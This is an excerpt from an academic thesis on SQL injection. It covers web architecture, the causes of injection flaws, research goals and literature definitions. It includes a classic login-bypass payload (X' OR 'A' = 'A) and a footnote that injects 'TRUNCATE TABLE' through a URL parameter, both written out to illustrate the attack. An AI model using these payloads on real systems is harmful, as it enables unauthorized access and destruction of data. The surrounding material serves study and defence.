BACKGROUND
on page 27), more and more abstraction layers are put on top of the previous, but one
cannot forget that at the very core, legacy systems and code are still present. Viega and
Messi (2004) cite an informational study based on security reviews of commercial code
where it was observed that C code – the de facto language used for coding some of the
eldest systems still running, such as the UNIX operating system – tends to have five to ten
times more vulnerabilities than Java code. Shankar et al. cited by Yao-Wen Huang et al.
(2004) detected insecure information flow within legacy code with little additional
annotation. According to Anh Nguyen-Tuong et al. (2004) it is tedious to review code
and look for vulnerabilities and this can result in some vulnerabilities to be overlooked. So
if in normal situations, where documentation and thorough knowledge of the code are
present, it is a difficult task to search and detect possible vulnerabilities, when it comes to
legacy, where by definition existing operating knowledge and documentation is scarce,
this could be an almost impossible task to achieve.
But more advanced systems, architectures and programming languages do not
necessarily mean a more hardened end-product. Viega and Messi (2004) state that
«although languages such as Java give programmers fewer chances to shoot themselves
in the foot than C does, there is still plenty of opportunity to take off some toes». In
addition to this, Web applications tend to have rapid development cycles (Huang et al.
2003). But the problems during development do not end up with the stress imposed by
rapid development cycles. Developers and development teams can be awfully
inconsistent. The programmer who worked on Function A in Script A might have nothing
to do with Function B in Script A, so while one parameter in Script A might be
vulnerable, another might not (Spett 2002). Spett also claims that one can never be sure,
and therefore, everything should be tested. But this is exactly where another problem
begins. According to Anh Nguyen-Tuong et al. (2004), although security plays a critical
role in nearly all Web applications, only a small fraction can afford a detailed security

introduction •
BACKGROUND
review. Because of this pressing need for speed and streamlining of the development
phase, the industry responded accordingly and developers today have a vast set of rapid
Web development frameworks and technologies, including Sun's J2EE (Java Server Pages,
Servlets, Struts, etc.), Microsoft's ASP and ASP.NET, PHP, and the Common Gateway
Interface (CGI) and all of these models make use of a tiered environment (Buehrer, Weide,
& Sivilotti 2005). But as stated earlier on this document, technology only facilitates. It
does not solve business problems, meaning, it is a big aid to have the industry
backing-up professionals and organizations with more and more advanced technologies
and frameworks, but at the end of the day success will be dictated by the installed
behaviours and methodologies.
Since the client-server architecture, applications are modelled into different logical layers
and subsequently, the supporting hardware infrastructure into tiers (Landsmann &
Strömberg 2003). Although there is some discussion around whether layers fit into
applications and tiers into infrastructure or vice-versa, the first option will be herein
preferred since it is closer to the de facto naming-conventions employed by the industry.
Understanding how the application is going to be deployed has a critical impact on its
design. In fact, defining the solution architecture is a pre-step when making use of the
Web development frameworks mentioned above. Whether if layers constrain tiers or tiers
dictate the definition of layers, it is irrelevant. Solution architects must look at the grand
picture when designing a Web solution. A typical Web solution entails three layers: the
presentation layer, middle layer, also known as business objects, and data layer (Buehrer,
Weide, & Sivilotti 2005;Landsmann & Strömberg 2003).

introduction •
BACKGROUND
Figure 8 - Classic Three-Tier Web Architecture Model
The presentation layer is typically represented by an Internet Browser and comes in the
form of HTML, although other types of content could be delivered. The middle layer is
where the business rules and logic that drives the application is defined, and finally, the
data layer providing data storage and retrieval services (Buehrer, Weide, & Sivilotti
2005;Landsmann & Strömberg 2003). These layers could be part of a more complex
architecture as in Figure 2 - The Evolution of Information Technology Architectures on
page 27, but the base actors are those defined by the classic three-tier Web architecture.
The database, Web server and application logic components are all parts of a larger
system (Landsmann & Strömberg 2003) no matter if these components are
tightly-coupled or loosely-coupled. Flaws in one component will certainly jeopardize the
whole solution as a chain is never stronger than its weakest link. Because this research
focuses on the bottom layer, the data layer, the remaining layers will not be described in
detail.
PPrreesseennttaattiioonn
IInntteerrnneett BBrroowwsseerr aanndd HHTTMMLL
BBuussiinneessss LLooggiicc
EEnnccaappssuullaatteedd BBuussiinneessss OObbjjeeccttss
DDaattaa
RReellaattiioonnaall DDaattaabbaassee

introduction •
BACKGROUND
One of the main reasons why this research aims at studying the data layer is due to its
paramount role in Web applications that deliver dynamic content, and therefore make
e-Business possible. Halfond & Orso (2005a) state that «many organizations have a need
to store sensitive information, such as customer records or private documents, and make
this information available over the network. For this reason, database-driven Web
applications have become widely deployed in enterprise systems and on the Internet».
Buehrer, Weide, & Sivilotti (2005) go even further and state that Web applications
employing database-driven content are ubiquitous. Not just Internet companies such as
Yahoo or Amazon, but also companies of the old-economy require a presence on the
Web, and almost always, this presence in ensured by means of a relational database. In
its simplest form, Web applications receive inputs coming from the user, forward them to
the business logic layer, which according to its rules will react according to the user’s
input, let’s say, when searching for a specific product, which in turn will be performing
some kind of task on the data services end.
Figure 9 - Use of Textual Representation in an Application
> adapted from (Pietraszek & Berghe 2005) <
TTeexxttuuaall
RReepprreesseennttaattiioonnss
NNeettwwoorrkk IInnppuutt
GGeett,, PPoosstt,, CCooookkiiee
DDiirreecctt IInnppuuttss
aarrgguummeennttss,, eennvv..
SSttoorreedd IInnppuuttss
DDBB,, XXMMLL,, CCSSVV
EExxeeccuuttee
sshheellll,, XXSSLLTT
QQuueerryy
SSQQLL,, XXPPAATTHH
LLooccaattee
UURRLL,, ppaatthh
RReennddeerr
HHTTMMLL,, SSVVGG
SSttoorree
DDBB,, XXMMLL
ccoonnssttaannttss
inputs outputs

introduction •
BACKGROUND
Figure 9 describes the various types of inputs an application may receive, and the
corresponding outputs it may generate. In a way, this diagram also depicts the three-tier
Web architecture, but using a horizontal approach centered around the logic beneath
the application, making it easier to discern the cause-effect outcome of the user input on
the outputs. The commonality across the various types of inputs and outputs is the fact
that all have a textual representation within the application and this is where code
injection attacks effectively go into action.
In summary, organizations cannot get rid of core business systems at the same rate
they become legacy, but legacy applications are known to be prone to development
errors (Huang et al. 2004;Viega & Messi 2004). While reality dictates that legacy
systems are integral part of the corporate IT infrastructure, they now have to endure
the pressure caused by the Web shift although they were never designed to
withstand such demand. In addition, Web applications tend to have rapid
development cycles (Huang et al. 2003). And although security is critical in almost
every Web application (Spett 2002), only a small fraction can afford a detailed
security review (Nguyen-Tuong et al. 2004). Web architectures are normally divided
in tiers, and flaws in one component will certainly jeopardize the whole solution. As
a result, most Web applications contain security vulnerabilities and serious security
vulnerabilities are regularly found in the most prominent commercial Web
applications including Gmail, eBay, Yahoo, Hotmail and Microsoft Passport (Nguyen-
Tuong et al. 2004). The dependency of Web applications on relational databases
and the role of databases within the organizations certainly elect it as a tempting
target for anyone seriously looking for crippling an organization, or gain personal
benefit.

introduction •
BACKGROUND
4 SQL Injection – The Research Topic
So far the reader has been taken on a journey across the three factors dictating the status
quo surrounding the research topic and the underlying causes behind logical attacks such
as SQL Injection attacks. These three factors are of organizational, technological and
methodological nature. The following diagram attempts to summarize the findings
portrayed on the preceding topics on consolidated view:
Figure 10 - Summary of the Causing Factors of SQL Injection
Throughout the years organizations have striven to reduce costs and leverage the use of
the existing technology assets at their disposal while seeking to better customer service,
improve competitivity, and be more responsive to the strategic priorities of the business
(Endrei et al. 2004) . This caused departmental boundaries to blur, providing the stage for
PPrroobblleemmss
RReemmaaiinneedd EEsssseennttiiaallllyy tthhee SSaammee
SSyysstteemmss IInntteeggrraattiioonn,, PPeeooppllee MMggmmtt,,
UUppddaattiinngg BBuussiinneessss PPrroocceesssseess
CChhaalllleennggeess
RReemmaaiinneedd tthhee SSaammee
CCoosstt--RReedduuccttiioonn,, RReevveennuuee
TTiimmee--ttoo--MMaarrkkeett
TTeecchhnnoollooggiiccaall >>
IITT SSeeccuurriittyy
MMaattuurree mmeecchhaanniissmmss ffoorr iinnffrraassttrruuccttuurree sseeccuurriittyy
IInneeffffeeccttiivvee mmeecchhaanniissmmss aaggaaiinnsstt llooggiiccaall aattttaacckkss
MMeetthhooddoollooggiiccaall >>
WWeebb PPaarraaddiiggmm
EExxppoonneennttiiaall ggrroowwtthh ooff iinntteerrccoonnnneecctteedd ssyysstteemmss
LLeeggaaccyy ssyysstteemmss aarree pprroonnee ttoo ddeessiiggnn ffllaawwss
DDaattaabbaasseess eennaabbllee ee--BBuussiinneessss,, bbuutt ddeeppeenndd oonn lleeggaaccyy
RRaappiidd ddeevveellooppmmeenntt ccyycclleess
OOrrggaanniizzaattiioonnaall >>
EEccoossyysstteemm PPaarraaddiiggmm
BBuussiinneessss UUnniittss aarree nnooww ppaarrtt ooff aann eeccoossyysstteemm wwiitthhiinn tthhee ccoommppaannyy
OOrrggaanniizzaattiioonnss aanndd IITT aalliiggnneedd ttoo ttrraannssvveerrssaall bbuussiinneessss pprroocceesssseess
Logical attack against data
and core business systems
via a front-end

introduction •
BACKGROUND
the implementation of transversal business processes. IT became more business-centric in
response to the Web shift even though the basic business problems and challenges
remained essentially the same. The advent of the Web carried the sight of new
unexplored markets, but the conquering rush unfortunately kept old problems unsolved.
Organizations have grown in complexity and size in great measure thanks to the
reliability and scalability of database management systems. As a result, security
increasingly became a concern and Web attacks are rapidly becoming one of the
fundamental threats for information systems connected to the Internet (Álvarez &
Petrovic 2003). This relatively new phenomenon can partially be explained by the
popularity of Web applications and techniques to exploit their security vulnerabilities
(Buehrer, Weide, & Sivilotti 2005). While most Web servers are separated from clients by
firewalls and other security devices, still from a security perspective, Web applications
offer users legitimate channels through firewalls into corporate systems. Often, these core
corporate systems are still comprised of legacy systems and applications. They now have
to endure the pressure caused by the Web shift although they were never designed to
withstand such demand, though it is a proven fact that such applications are prone to
design flaws (Huang et al. 2004;Viega & Messi 2004). The dependency of Web
applications on relational databases and core business legacy systems and the role of
databases within the organizations certainly elect them as a tempting target. This lead to
the proliferation of logical attacks which try to fool the application into executing some
carefully crafted code on the hacker’s behalf using the application’s security context. SQL
Injection is a type of code-injection attack targeting databases that are accessible,
typically through a Web frontend, which takes advantage of flaws in the input validation
logic of application components in order to achieve its purposes.

introduction •
BACKGROUND
4About SQL Injection
SQL, acronym for Structured Query Language, is a standard interactive and programming
language for getting information from and updating a database. Melton (1996) defines
it as a relational database data sublanguage. Although SQL is both an ANSI and an ISO
standard, many database products support SQL with proprietary extensions to the
standard language4
. Queries take the form of a command language (Anley 2002b).
Anley also adds that the typical unit of execution of SQL is the “query”, which is a
collection of statements that typically return a single “result set”. SQL statements can
modify the structure of databases (using Data Definition Language statements, or DDL)
and manipulate the contents of databases (using Data Manipulation Language
statements, or DML). As a standard language for all relational database management
systems, one cannot say SQL Injection is caused by flaws of a specific product, but is
rather the result of failure to validate inputs within the applicative components5
.
Literature provides an extensive set of definitions for SQL Injection which orbit fairly close
around the same base concept. Álvarez & Petrovic (2003) provide a broad and simple
definition by stating that an SQL Injection attack is in place when «an attacker creates or
alters existing SQL commands to gain access to unintended data or even the ability to
execute system level commands on the host.». Yet Yao-Wen Huang, Shih-Kun Huang, Lin,
& Tsai (2003) prefer to center it on the Web. This view is also shared by several other
sources (Anley 2002b;Boyd & Keromytis 2004;Cerrudo 2002;Huang et al. 2004;Kost
2003). In summary, these sources define SQL Injection as a flaw on the input validation
logic of a Web application that via a Web frontend receives user input containing
4
The SQL dialect used on this work will be Microsoft’s, also known as Transact-SQL.
5
As the topic is RDBMS-agnostic, this work will use Microsoft SQL Server, one if not the most popular RDBMS, as
the base platform whenever examples or experimentation take place

introduction •
BACKGROUND
malicious patterns used on the construction of a legitimate SQL query, ultimately leading
to the arbitrary execution of SQL and operating system commands.
4Simple Conceptual Example
As a motivating example, let’s consider a scenario of an online banking application that
allows customers to log in and view their accounts, make payments, and so on and so
forth. In order to access these services, customers must undergo a compulsory
authentication step by providing logon credentials in the form of a username and a
password on a dedicated page specially created for that purpose. This Web page
represents the third tear of the classic Web application model (consult Figure 8 - Classic
Three-Tier Web Architecture Model on page 40). When data is submitted to the
middle-tier, the corresponding applicative modules (ASP, JSP, CGI, Perl, etc.) will take the
user’s input and use it for building a query to be executed against the data-tier. The data-
tier is almost always represented by a relational database management system and
consequently the query built by the middle-tier components is written on the SQL dialect
of that RDBMS. On this scenario, a typical validation query would look similar to this:
The SQL language was designed to be similar to English and anyone without any
knowledge of SQL could probably understand the meaning of the expression. It queries
the database for all the information registered for user “Miguel” with password “secret”,
which implicitly denotes that a response is expected. Among other actions, this response
will be used to determine if the user has successfully authenticated6
by proving his
6
Authentication is only one out of three principal mechanisms applied for ensuring security’s key goals.
Encryption and access control complete this set.
Select * From Users Where Login='Miguel' and Password='secret'

introduction •
BACKGROUND
identity. For example, if the database response is empty, the underlying implication is that
there is no such user named “Miguel” with password “secret” on record. On the other
hand, a valid response from the database would inform the components on the
middle-tier that the user is authentic. The middle-tier then produces an output to the
presentation-tier according to the business rules. This output typically represents the very
next Web page the user is presented with and its contents are contextualized according
to the user data returned by the database. Furthermore, it is common for this output to
contain a security token which will enable the user to perform various consequent actions
on the application without the need for re-authenticating. In this scenario, the output
should be a Web frontend containing a security cookie and exhibiting a set of menus
with options that enable the user to view his account movements, make payments and
perform all sorts of financial transactions. How does SQL Injection fit into all this?
Suppose the user is knowledgeable about it and decides to perform a logical attack on
the application by injecting some malicious code on the user and password textboxes on
the logon Web page in the hopes to fool the authentication logic of the underlying Web
application. Consider the following value for username and password:
This simple text string does not require any special tool to develop, nor any hacking
program to send it to the Web server. The resulting validation SQL query performed by
the middle-tier against the database would look like:
Select * From Users Where
Login='X' OR 'A' = 'A' and Password='X' OR 'A' = 'A'
X' OR 'A' = 'A

introduction •
BACKGROUND
Analyzing this query is a little more complicated than the previous as a logical analysis is
required. First, the resulting query is well-formed in terms of its syntax. Second, its
semantics is kept unaltered, meaning no other structures or database objects are therein
referred. In other words, no knowledge of the database structure was required. Third and
most important, the WHERE expression evaluates to true. “A” is equal to “A”, then the
expression evaluates to true. Binary logic dictates that False OR True = True. In common
words, if something is false or is true, for example if someone says «I’m male or I’m
female», the outcome is always true. So if the login is “X’ which is probably false, but “A”
is always equal to “A”, then that piece of the expression always evaluates to true. Likewise
happens on the second portion which contains the evaluation of the password. So the
remaining logical expression to evaluate is comparing the “True” resulting from the login
evaluation and the “True” resulting from the password evaluation. This comparison using
the AND logical operator yields “True”, resulting in the authentication mechanism to be
bypassed and proving free access to the account of the unlucky user who had the
privilege to be listed at the top.
All networking security mechanisms were bypassed as a legitimate channel was used to
reach out to the database. Furthermore, Web requests such as the one depicted on the
example are often transmitted in the form HTML form posts. Due to the data load, such
requests are typically not logged, hence making the attack virtually undetected as no
activity trail has been left behind. This rather simple example demonstrates the power of
this technique and the losses it can inflict on people and organizations.

introduction •
ABOUT THIS RESEARCH
ABOUT THIS RESEARCH
Up to now the research topic, its background and status quo have been broadly outlined,
all with the purpose of introducing the goals that stand behind this research, its purpose,
motivation, and most important of all, the research question. These will be properly
addressed over the next subtopics.
4 The Problem and Challenges
The statement of Landsmann & Strömberg (2003) that «Every Web Application using a
relational database can theoretically be a subject for SQL Injection attacks» summarizes in
a very neat way the seriousness of the SQL Injection threat and the overwhelming
challenge of countermeasuring it. Three key points surface from the Background topic as
the foremost factors supporting this statement: a) this type of attacks caught
organizations completely unprepared as it tears down existing security barriers, thereby
shattering existing investments in IT security; b) it is a relatively new problem as the
Internet comes forth as “The” catalyser responsible for the increase on the number and
diversity of attacks; c) lack of awareness is probably the single most important factor
accountable for this technique’s success, causing other researchers and IT experts to get
held back on their efforts to further investigate and address this issue in a consistent and
systematic way. By now it is clear the edge stands on the hacker community side and
literature states that it seems that only minimal resources are being invested (Landsmann
& Strömberg 2003). Furthermore, the lack of academic literature on the subject is
astonishing, and while the IT industry has begun awakening to the problem, the number
of rich and ingenious available resources scattered across hacking sites and underground
communities is absolutely remarkable compared to what researchers and IT experts have
as baseline for their studies.

introduction •
ABOUT THIS RESEARCH
4 The Research Question
«Can the weakness of modern e-Business systems be demonstrated
by proving SQL Injection techniques to be effective in obtaining and
altering private business data? »
The research question almost comes naturally from the research topic, and although it
looks pretty straightforward and a subject of experimentation in order to confirm what
literature states, the hard work lies beneath. As previously stated, the topic has been
neglected as the growth of attacks is fairly recent, and therefore there are few studies
that can be used as support basis. For that matter, it is necessary to develop a taxonomy
of attacks first in order to prove the research question right or wrong. So the added value
of this research does not lie directly on the research question itself, but on the underlying
steps. Proving it will only serve to validate the taxonomy.
4 Purpose and Goals
Now that an overview on the problem and its underlying challenges have been
presented, it is now appropriate to address questions such as “what do we already know
on the subject?” and “how does this research fit into the grand picture composed by
similar studies in the field?”. Literature clearly indicates the topic has barely been studied
thus far (Landsmann & Strömberg 2003) and security standards and in-built security
measures urge to be developed. Actually, the word “awareness”, or lack of such,
summarizes what probably is the prime factor contributing for the hacker’s community
lead. No taxonomy of attacks has ever been attempted and resources on the topic still lay
scattered across various underground sources. The stakes are high as organizations have
much to lose from those that without much effort and with some ingenious

introduction •
ABOUT THIS RESEARCH
craftsmanship can maliciously take over what is most treasured within an Information
Society: Information itself. This research primarily seeks to shed some light on the
obscurity that for far too long has been characteristic of the topic, by proposing a
taxonomy of attacks which will consolidate existing academic, professional and
underground materials. It is not this work’s goal to provide enough experimental
evidence to validate the taxonomy, nor will a set of preventive techniques be proposed,
although these are valid questions worthy to be studied in future works. Nonetheless,
whenever appropriate some experimentation and smart defensive techniques will be
mentioned.
4 Scope
The scope of SQL Injection and its implications extend far beyond databases, Web
applications and security, and even those are vast areas of research of their own.
Therefore it is necessary to narrow down the scope of this research in addition to the
scope already set by the research topic and research question. The following bulleted list
attempts to summarize the scope of this work:
• Portray the status quo as an introductory path to the topic:
Ø Systematize the most commonly used set of practices and systems
architectures used for implementing e-Business platforms;
Ø Establish a clear dependency of e-Business systems on relational database
management systems;
• Expose SQL Injection:
Ø By investigating different variations;
Ø By proposing a taxonomy of attacks:
§ Explaining the concept;

introduction •
ABOUT THIS RESEARCH
§ Modus Operandis;
§ Effectiveness of the technique;
§ Applicability scope;
• Perform experimentation and ultimately answer to the research question;
• Based on the gained experience, propose simple first line defensive techniques.
4 Motivation
Part of the motivation for pursuing this research comes from the fact the researcher
being a solution architect for the Hewlett-Packard Corporation acting in the Enterprise
Application Services practice of the Consulting & Integration division. While interfacing
with or auditing corporate systems, all too often he faces many situations where an SQL
Injection attack could easily devastate the core business systems and cripple the
company’s ability to do business. The lack of awareness is almost unbelievable;
developers are rarely coding defensively, and systems engineers have the false feeling their
extremely expensive set of firewalls and intrusion detection systems will ensure IT security.
The stakes are indeed high and organizations that have suffered such attacks and have
actually detected them, rarely speak up as it would further compromise their ability to
guarantee integrity, availability and confidentiality to its customers. Therefore, the
motivation and prime goal of this work is to expose and systematize the problem, and
then prove the proneness of the major and most popular e-Business systems to these
attacks, thus empowering other researchers and IT experts to pursue further
developments in security.

introduction •
ABOUT THIS RESEARCH
4 Document Outline
This thesis is divided into seven chapters plus two additional sections, namely References
and Glossary which can be found at the end of the document. The organization of
chapters and their purpose is as follows:
Chapter 1 INTRODUCTION
Introduces the research topic by providing an overview of the facts
that lead to the formulation of the research question.
Chapter 2 LITERATURE REVIEW
Describes the process of providing a detailed and justified analysis
of and commentary on the merits and faults of the key literature.
Chapter 3 METHODOLOGY
Presents an overview of the research methods ecosystem and
formulates the research methods for addressing this work’s goals.
Chapter 4 ATTACK TAXONOMY
Performs a survey of the existing SQL Injection techniques and then
proposes the very first taxonomy of SQL Injection attacks.
Chapter 5 EXPERIMENTING
Performs experimentation on a real live system on the Internet as
means of building internal validity.

introduction •
ABOUT THIS RESEARCH
Chapter 6 DEFENSIVE TACTICS
Presents a first line of defensive tactics against SQL Injection attacks.
Chapter 7 CONCLUSIONS
Presents a final argument and what did this work accomplish in
terms of bridging the gap between different bodies of Knowledge.
REFERENCES
Formal list of all bibliographic sources acknowledged and
referenced throughout this thesis.
GLOSSARY
Consistent set of acronyms, jargon and definitions which are used
throughout this thesis.

Chapter 2
LITERATURE REVIEW
Critical literature review will form the foundation on
which the research is built. It describes the process of
providing a detailed and justified analysis of and
commentary on the merits and faults of the key literature
on the research topic. Despite it generally is an early
activity, the process can be likened to an upward spiral
mounting throughout the project’s lifespan.
This chapter outlines the findings of an extensive literature review performed on
the research topic and attempts answering to questions such as “what do we
already know on the subject?” and “how does this research fit into the grand
picture composed by similar studies in the field?”. The chapter ends with a
critical analysis of the findings inline with the researcher’s critical judgment

literature review •
RESEARCH STRATEGY
RESEARCH STRATEGY
According to Cormack (1991), a literature review is «… the process of systematically
identifying published materials which meet predetermined criteria». Regardless if the
review itself claims to be systematic, according to Hek et al. (2000) the searching process
should always be so. Saunders, Lewis, and Thornhill (2003) add that «critical literature
review will form the foundation on which the research is built. It describes the process of
providing a detailed and justified analysis of and commentary on the merits and faults of
the key literature on the research topic». Therefore a literature review contains two very
important characteristics: it should be systematic, so that other researchers following the
same footsteps should be able to replicate the findings, and it should be critic, which
denotes that the researcher’s critical judgment will be used (Saunders, Lewis, & Thornhill
2003) to mitigate findings in producing the review conclusions. This last stage is where
the researcher blends with the systematic part of the literature research process by
adding its own unique touch to the outcome. Since Science requires results to be
possible to be replicated by other researchers – although there is still some discussion
around the participatory role of the researcher on inductive research – it is imperative that
a clear literature research strategy is set as a blueprint of what is yielded by the whole
literature review process.
Saunders, Lewis, and Thornhill (2003) state that despite literature search is an early
activity for most researchers, it is usually necessary to revisit this activity during the
project’s life. This recursiveness can be likened to an upward spiral mounting throughout
the project’s lifespan culminating in the final draft of a written literature review. The
following diagram attempts to depict this spiralling process as stated by Saunders:

RESEARCH STRATEGY
Figure 11 - The Literature Review Process
> adapted from (Saunders, Lewis, & Thornhill 2003) <
RReesseeaarrcchh QQuueessttiioonn
aanndd OObbjjeeccttiivveess
DDeeffiinnee
ppaarraammeetteerrss
GGeenneerraattee aanndd
rreeffiinnee kkeeyywwoorrddss
WWrriitttteenn ccrriittiiccaall rreevviieeww
ooff tthhee lliitteerraattuurree
RReeccoorrdd
EEvvaalluuaattee
OObbttaaiinn
LLiitteerraattuurree
CCoonndduucctt
sseeaarrcchh
UUppddaattee aanndd
rreevviissee ddrraafftt
RReeddeeffiinnee
RReeccoorrdd
EEvvaalluuaattee
OObbttaaiinn
lliitteerraattuurree
CCoonndduucctt
sseeaarrcchh
SSttaarrtt DDrraaffttiinngg
RReevviieeww
RReeddeeffiinnee
CCoonndduucctt
sseeaarrcchh
OObbttaaiinn
lliitteerraattuurree
EEvvaalluuaattee
RReeccoorrdd

RESEARCH STRATEGY
For the sake of simplicity, instead of documenting each and every interaction the author
underwent while searching literature, only the research strategy and its yieldings will be
presented. For that matter, Bell’s check list will be used. Bell (1999) proposes a concise
checklist which provides an action plan for collecting information about the research
topic. This checklist is herein briefly described:
• Define the review topic;
• Identify the key concepts and associated terminology;
• Define parameters:
Ø Language – only materials in English?
Ø Geography – only materials published in the UK?
Ø Time Period – only the last five years?
Ø Type of Materials – Books, journal articles, newspaper articles, Internet
pages, etc.
Ø Sector – NHS, private sector;
• List possible search terms;
• Identify appropriate sources of information to be searched;
• Review and refine search as necessary;
• Document review methods and results.
Not surprisingly, the definition of the research topic and its subsequent well-formed
answerable research question should also be supported by literature. Formulating a
well-defined research question, meaning it must be precise rather than broad and
answerable rather than ill defined, is crucial since it will serve as both starting and end
point of the whole literature review process as per the model depicted in Figure 11 - The

RESEARCH STRATEGY
Literature Review Process on page 57. This view is also shared by Huth (1982). He states
that a well-conceived review always answers the question specified at its beginning.
Furthermore, the research question or the research objectives might conceal several
subtopics within themselves and separate review cycles on those subtopics may be
necessary. For this research, a quick review of the research objectives described on the
Purpose and Goals and Scope sections on pages 50 and 51 will yield several subtopics
that need to be addressed, namely “SQL Injection”, the main topic, attached to it comes
“Relational Databases”, “SQL”, “Logical Attacks” and “Code-Injection”, then “Web” and
“e-Business” and finally “Taxonomy Formulation”.
One could legitimately ask from where did such terms came from? The answer is
literature review. Despite if other activities or methods were used, for example the
researcher’s own gained experience, documented scientific knowledge must be used as
rationale for each and every claim. This principle also applies when claiming the existence
of a scientific emptiness in one particular field as a basis for conducting research and
consequently formulating the research question. Proof for that claim is required, and
therefore a literature review process is compulsory. Of course the researcher’s own gained
experience still plays an important role. Systematic thinking and acting is not an easy task
and takes time to learn. Experience is ultimately an ally guiding the steps toward efficient
finding of the information resources required to answer the burning question on the
researcher’s mind. Although the activities engaged to formulate the research topic,
question and objectives were not herein documented, the process followed was the one
depicted on Figure 11 - The Literature Review Process on page 57, and its yieldings
laid-out on the introductory chapter. This initial review led to the identification of possible
key concepts and associated terminology surrounding the research topic, which were
later used on this literature review. The resulting list of terms is the one yielded by the

RESEARCH STRATEGY
above-mentioned breakdown of the research question and its objectives, in particular
“SQL Injection”, “Logical Attacks”, “Code-Injection” and “Taxonomy”.
In regards to search parameters, i.e. language, geography, time period, type of materials
and sector, the topic is itself transversal to all of these and no predefined scope reduction
other than logistics and human limitations were introduced. Literature clearly prefers to
centre the research topic on the Web (Anley 2002b;Boyd & Keromytis 2004;Cerrudo
2002;Huang et al. 2004;Kost 2003), thus making it global and multilingual, although the
linguistic knowledge of the researcher limits him to English, Portuguese and French
sources. The research topic also concerns corporations as they began to adhere to Web
applications by connecting their systems to the Web and database-driven Web
applications have become widely deployed on the Internet (Halfond & Orso 2005b). For
that reason, in regards to sectors, both academic and privately held information sources
were considered, though it has been observed a tremendous lack of academic literature
on the subject, whereas the number of rich and ingenious available resources scattered
across hacking sites and underground communities is absolutely remarkable. Not
surprisingly, the timeframe of the collected information sources spans from mid 90’s until
present days, which roughly coincides with the dawn of e-Commerce and the
subsequent raising of Web attacks (Álvarez & Petrovic 2003;Buehrer, Weide, & Sivilotti
2005).
The following information sources were the primary search engines used when hunting
out for literature using the search terms identified:
• Biblioteca do Conhecimento Online – http://www.b-on.pt;
• Wiley Interscience – http://www3.interscience.wiley.com;
• SpringerLink – http://www.springerlink.com;

RESEARCH STRATEGY
• IEEE Xplore – http://www.IEEE.org;
• ACM Digital Library – http://portal.acm.org;
• Web of Science – http://portal.isiknowledge.com;
• ProQuest – http://proquest.umi.com;
• Scitation – http://scitation.aip.org;
• Citibase Search – http://citebase.eprints.org;
• Google – http://www.google.com;
• Google Scholar – http://scholar.google.com (Beta);
• E-Donkey peer-to-peer network.
These primary search engines served as starting point for the literature review process and
were revisited each time a search and review cycle took place. At that stage, internal
evidence was the leading factor used for steering the actions to be undertaken in the
forthcoming review cycles as the researcher has opted to engage the formal critical
analysis phase at the very end of the review process.

FINDINGS
FINDINGS
This section aims to portray in a structured fashion what the literature review process
illustrated in Figure 11 - The Literature Review Process on page 57 has yielded. The fact it
is named “Findings” instead of “Yieldings” implies that some refining, reasoning and
sorting of materials has taken place even prior to the formal critical review phase. These
materials are of various types and span across a wide spectrum of information sources,
still, the majority of collected sources proceed from the primary and secondary
information sources as per the following diagram:
Figure 12 - Literature Sources Available
This outcome is not totally unexpected and it can be explained in great measure by the
fact of the research topic being a relatively new phenomenon as established on the
introductory section. Therefore, the reader should expect to find several references to
industry reports and Internet sources over the forthcoming subtopics, yet, a significant
effort was made in order to confirm and consolidate the claims held by such sources by
recurring to academic materials whenever those were available.
Reports
Theses
Emails
Conference Reports
Company Reports
Some Gov. Publications
Unpublished Work
PPrriimmaarryy SSeeccoonnddaarryy TTeerrttiiaarryy
LEVEL OF DETAIL
TIME TO PUBLISH
Newspapers
Books
Journals
Internet
Some Gov. Publications
Indexes
Abstracts
Catalogues
Encyclopedias
Dictionaries
Bibliographies
Citation Indexes

FINDINGS
4 Definition of SQL Injection
At this point the research topic should not be an alien subject to the reader as an
overview of the surrounding facts has been portrayed on the introductory chapter. In
accordance with that chapter’s goals, an empiric view has been employed as guiding
principle for introducing the topic. Hence, no formal definition for SQL Injection has been
presented nor has a review of the existing proposed definitions been attempted.
Finding a suitable definition for SQL Injection is not an easy task. Queries for a standard
definition performed on the IEEE and ISO web sites yield nil. A quick search on the
world’s best known encyclopaedia, Britannica, will output the same result. Even Google’s
powerful search engine only returns four entries for «define:”SQL Injection”», one of
which provided by Wikipedia, another famous encyclopaedia known for its operating
model which is totally entrusted to its community of members. The article states that
«SQL Injection is a security vulnerability that occurs in the database layer of an
application. Its source is the incorrect escaping of dynamically-generated string literals
embedded in SQL statements» (Wikipedia 2006f). Though the argument that it occurs in
the database layer can be subject of discussion (see Figure 8 - Classic Three-Tier Web
Architecture Model on page 40), this simplistic definition offers an entry-level view into
the problem and it puts the finger right on where it hurts the most. It mentions three
causative key factors: i) dynamically-generated string literals; ii) embedding into SQL
statements; iii) escaping. The attempt to define SQL Injection by employing a cause-effect
perspective that briefly describes the modus operandis is recurring throughout literature.
This was pretty much the strategy taken for introducing the topic in the last section of
the first chapter. Landsmann & Strömberg (2003) define it as «an attack method used by
hackers to retrieve, manipulate, fabricate or delete information in organizations’ relational
databases through web applications». Yao-Wen Huang et al. (2003) employ a similar

FINDINGS
view, yet, they opt for a more generic description of the type of operations one can
perform and complement the definition by pinpointing data validation as a causative
effect. They state that «if the data is not properly processed prior to SQL query
construction, malicious patterns that result in the execution of arbitrary SQL or even
system commands can be injected». Finnigan (2002) explores this concept deeper by
introducing another concept which is bypassing of existing security mechanisms. He
states that SQL Injection is a way to attack the data of database which is protected by a
firewall by which the parameters of a Web application are modified in order to change
the SQL statements being executed against the backend database management system.
He also adds that «for example, by adding a single quote (‘) to the parameters, it is
possible to cause a second query to be executed with the first», thus escaping the first
portion of the query and injecting a new one. As mentioned by Finningan, single-quote
escaping is just an example and these types of injections are not limited strictly to
character fields (Boyd & Keromytis 2004). They declare that analogous manipulations of
the query’s WHERE and HAVING clauses have been referenced when, for example, the
application does not restrict numeric data used on numeric fields7
. This technique can
also exploit implicit type casting of the RDBMS, e.g. integers being automatically
converted to strings and vice-versa. Kost (2003) opts for broader perspective an defines
SQL Injection as when an «attacker passes string input to an application in hopes
manipulating the SQL statement to his or her advantage». He also claims that SQL
Injection attacks are simple in nature and that the complexity of the attack involves
7
Suppose that in this legitimate query SELECT * FROM [Orders] WHERE CustomerID=104, where 104
stands for a numeric parameter on the URL of a web page, e.g. http://server/getOrders.aspx?CustomerID=104,
the value for the CustomerID parameter is manipulated to be equal to 1;TRUNCATE TABLE [Orders]. This
simple example would cause the orders table to be completely wiped out by means of a second query injected on
a parameter that was supposed to be numeric.

FINDINGS
exploiting a SQL statement that may be unknown to the attacker. Sam M.S. (2005)
